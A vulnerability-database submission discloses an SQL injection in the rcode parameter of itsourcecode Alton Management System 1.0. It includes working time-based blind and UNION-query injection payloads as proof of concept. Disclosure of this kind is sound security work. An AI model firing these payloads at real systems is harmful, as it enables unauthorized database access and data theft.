Submit #381091: itsourcecode Alton Management System 1.0 SQLi retation_status.phpinfo

Titleitsourcecode Alton Management System 1.0 SQLi retation_status.php
DescriptionAfter logging into the administrator account, use the POST method to request the "/retation_status.php" and "/summary.php" page, with the rcode parameter included in the request. Due to the page's lax filtering of rcode parameters, SQL injection vulnerabilities have been created. ------------------POC------------- Parameter: rcode (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: rcode=1' AND (SELECT 9171 FROM (SELECT(SLEEP(5)))KcsI) AND 'jidV'='jidV Type: UNION query Title: Generic UNION query (NULL) - 26 columns Payload: rcode=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176706271,0x4d78644f7042646e4f6b4b56754f67766354594c7759596f577845587869484d636b6e51794c4f70,0x7176626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Source⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-2.md
User
 Dee.Mirage (UID 71702)
Submission07/27/2024 12:22 (2 years ago)
Moderation07/30/2024 15:29 (3 days later)
StatusAccepted
VulDB entry273143 [itsourcecode Alton Management System 1.0 /reservation_status.php rcode sql injection]
Points20

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!